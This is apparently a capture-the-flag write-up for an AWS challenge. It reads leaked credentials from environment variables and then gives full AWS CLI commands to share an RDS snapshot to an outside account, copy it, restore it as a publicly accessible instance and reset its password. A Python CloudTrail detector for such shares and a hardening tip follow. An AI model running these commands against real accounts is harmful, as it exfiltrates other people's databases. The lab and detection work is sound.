Pipeline Drift

I threw the key into prowler while I tried out other challenges.

Looking at the prowler output, it mentions that there are sensitive plaintext credentials in environment variables. Let's retrieve them.


Using pacu, I identified that the leaky user has access to RDS.

There's a stopped RDS snapshot; let's try to copy it out to our own account.
To do that, we will need to add our account ID:
aws rds modify-db-snapshot-attribute \
--db-snapshot-identifier legacy-app-db-snapshot \
--attribute-name restore \
--values-to-add [REDACTED] --region us-west-2 --profile pipeline2

aws rds copy-db-snapshot \
--source-db-snapshot-identifier arn:aws:rds:us-west-2:507880288605:snapshot:legacy-app-db-snapshot \
--target-db-snapshot-identifier my-restored-copy \
--region us-west-2

Next, we restore the snapshot:
aws rds restore-db-instance-from-db-snapshot \
--db-instance-identifier my-restored-db \
--db-snapshot-identifier my-restored-copy \
--db-instance-class db.t3.micro \
--publicly-accessible \
--region us-west-2

Change the snapshot master password, and whitelist our own IP address so that we are able to access the RDS.


Now, we are able to use mysql to connect to the RDS and retrieve the flag.
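From the snapshot owner's side, the `modify-db-snapshot-attribute` call above is the step made with the owner account's credentials, so it is the one to alert on. The following is an added example, not part of the original write-up: it scans CloudTrail-style records for `restore` shares to accounts outside an allowlist. The sample records, user names, the account `222222222222`, and the camelCase `requestParameters` field names are constructed assumptions.

```python
import json

# Accounts allowed to receive shared snapshots (owner ID taken from the page).
TRUSTED_ACCOUNTS = {"507880288605"}

# Constructed CloudTrail-style records; the camelCase requestParameters
# field names are assumptions about the record layout.
SAMPLE_EVENTS = json.loads("""
[
 {"eventSource": "rds.amazonaws.com", "eventName": "ModifyDBSnapshotAttribute",
  "userIdentity": {"arn": "arn:aws:iam::507880288605:user/example-ci-user"},
  "requestParameters": {"dBSnapshotIdentifier": "legacy-app-db-snapshot",
   "attributeName": "restore", "valuesToAdd": ["222222222222"]}},
 {"eventSource": "rds.amazonaws.com", "eventName": "ModifyDBSnapshotAttribute",
  "userIdentity": {"arn": "arn:aws:iam::507880288605:user/example-dba"},
  "requestParameters": {"dBSnapshotIdentifier": "nightly-backup",
   "attributeName": "restore", "valuesToAdd": ["507880288605"]}},
 {"eventSource": "rds.amazonaws.com", "eventName": "ModifyDBSnapshotAttribute",
  "userIdentity": {"arn": "arn:aws:iam::507880288605:user/example-ci-user"},
  "requestParameters": {"dBSnapshotIdentifier": "legacy-app-db-snapshot",
   "attributeName": "restore", "valuesToAdd": ["all"]}},
 {"eventSource": "rds.amazonaws.com", "eventName": "ModifyDBSnapshotAttribute",
  "userIdentity": {"arn": "arn:aws:iam::507880288605:user/example-dba"},
  "requestParameters": {"dBSnapshotIdentifier": "nightly-backup",
   "attributeName": "restore", "valuesToRemove": ["222222222222"]}}
]
""")

def snapshot_share_findings(events, trusted=TRUSTED_ACCOUNTS):
    """Return (kind, snapshot, target, actor) for each risky share request."""
    findings = []
    for ev in events:
        params = ev.get("requestParameters") or {}
        if (ev.get("eventSource"), ev.get("eventName")) != (
                "rds.amazonaws.com", "ModifyDBSnapshotAttribute"):
            continue
        if params.get("attributeName") != "restore":
            continue  # only the restore attribute controls snapshot sharing
        actor = (ev.get("userIdentity") or {}).get("arn", "unknown")
        for target in params.get("valuesToAdd") or []:
            if target in trusted:
                continue
            kind = "public-share" if target == "all" else "external-share"
            findings.append(
                (kind, params.get("dBSnapshotIdentifier"), target, actor))
    return findings

if __name__ == "__main__":
    for finding in snapshot_share_findings(SAMPLE_EVENTS):
        print(finding)
```

The complementary control is to withhold `rds:ModifyDBSnapshotAttribute` from pipeline identities that do not need it.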

